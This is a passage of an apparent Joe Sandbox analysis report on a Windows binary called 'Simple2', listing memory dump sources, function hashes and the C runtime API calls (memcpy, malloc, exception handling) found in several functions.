            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: __current_exception__current_exception_contextterminate
            • String ID: csm
            • API String ID: 2542180945-1018135373
            • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
            • Instruction ID: 714a8ecb04bc9495845ebbd26baaf2169adc6d761f5b4627944fbf5f0c0315f5
            • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
            • Instruction Fuzzy Hash: 3AF0F437649B45CADB14AF61E8801AC3764FB8AB88B495134FB8D87765CF38E891D340
            APIs
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876BA002
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876BA048
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876BA052
              • Part of subcall function 00007FF6876BB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876BA08E
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: 1a9245936d2af9e59103349979f080b13697f3e2d58860a74c57808a2e834132
            • Instruction ID: 08f88e62975d09beb75b04dc187f7d154c52c33b51e44ba7b62441387bde5ba5
            • Opcode Fuzzy Hash: 1a9245936d2af9e59103349979f080b13697f3e2d58860a74c57808a2e834132
            • Instruction Fuzzy Hash: 6841BB22B58B41C1EE149B21E5441686369BF4ABF4F584738EABD87BD8DE7CF091E304
            APIs
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876B9E58
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876B9E9B
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876B9EA5
              • Part of subcall function 00007FF6876BB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B9EE0
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: 40ec7531a5140d9a34a05d810270c497e92faa9370d006b00b585f92f7ddb58e
            • Instruction ID: bc331f2e76e848b40d26566658659326d571453528f32daad906b7fd438539ed
            • Opcode Fuzzy Hash: 40ec7531a5140d9a34a05d810270c497e92faa9370d006b00b585f92f7ddb58e
            • Instruction Fuzzy Hash: 2841DE22B48B42C1EE149B22A544169A265BF56BF4F944738EE7D877E5DE3CF082E300
            APIs
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF6876B4851), ref: 00007FF6876B9A19
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6876B4851), ref: 00007FF6876B9A4E
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6876B4851), ref: 00007FF6876B9A5E
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B9A92
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: aa646745353d7203da832671085d0b0196717f6d70c4c5319a692b517eda2660
            • Instruction ID: d7812288d33284e3b51459a25bf8af4db37a16991ae7f66e3c045a8b7975d389
            • Opcode Fuzzy Hash: aa646745353d7203da832671085d0b0196717f6d70c4c5319a692b517eda2660
            • Instruction Fuzzy Hash: 8841D222B58B51D0EE10DB21A4402696264BF5ABF4F588739EEBD87BC1EE3CE4C1D300
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e7db282e29bddddf1267576aac1fe13729b1fc00772b1e8be868d075bea65a2a
            • Instruction ID: 8c1276e7715812672004eac9ea437e2dffef213a6682899a684e4391c16d20a0
            • Opcode Fuzzy Hash: e7db282e29bddddf1267576aac1fe13729b1fc00772b1e8be868d075bea65a2a
            • Instruction Fuzzy Hash: 94515F72648A82C5DF208F29E49036977A5FB86BA4F54413BEA5D877A8DF3CE484D700
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: b5567b20c1f48cca5cd3c98e9b81db459c25ab05fbe078c65d7ecd545c62c5ee
            • Instruction ID: b139226ec1f9d85937df03df554aca7909e432a5955b455b812b8d374d7f13ad
            • Opcode Fuzzy Hash: b5567b20c1f48cca5cd3c98e9b81db459c25ab05fbe078c65d7ecd545c62c5ee
            • Instruction Fuzzy Hash: C931F521B48A41D5EE149B25D64426D6791BF06BE0F184639EB5D87BC9DE3CF0C4E300
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: e5f8016ce02fca7137d677ca64b78271ca401d371dfa4f4d45820aa9f735801d
            • Instruction ID: 18836281a2bd67b79fbfa6b6bb995268090d054d00593473efc1120826d68b69
            • Opcode Fuzzy Hash: e5f8016ce02fca7137d677ca64b78271ca401d371dfa4f4d45820aa9f735801d
            • Instruction Fuzzy Hash: D831C422A89746D1ED149B51A4401782294BF46BB4F1C4B39FA3D87BD0DF38F8D2E300
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: 0f707cf3714be254ec86991dfb91e6bddc1a538670df425c4e68032ecd5601c6
            • Instruction ID: 011c8d3915b285dbabb47b7e3c7092ab6d49e52d2e213e1bb3e2c13013d15d4d
            • Opcode Fuzzy Hash: 0f707cf3714be254ec86991dfb91e6bddc1a538670df425c4e68032ecd5601c6
            • Instruction Fuzzy Hash: F3310222B49781D4EE159B15A9042A9A291BF46BD0F484639EE6D8B7C5DF7CF0D1F300
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task
            • String ID:
            • API String ID: 326894585-0
            • Opcode ID: be6c2b503efa53b437df304cc74228248089b4d96591b262b67b60ba1b7937c9
            • Instruction ID: db46a12db554ffab63d800db7613aa9a987ca578d599eecf8e543b5e4ced89a2
            • Opcode Fuzzy Hash: be6c2b503efa53b437df304cc74228248089b4d96591b262b67b60ba1b7937c9
            • Instruction Fuzzy Hash: AD212922B49756D4EE259B11A4003381280BF16BE4F180A38EE6D87BC5DF3CB4C2E700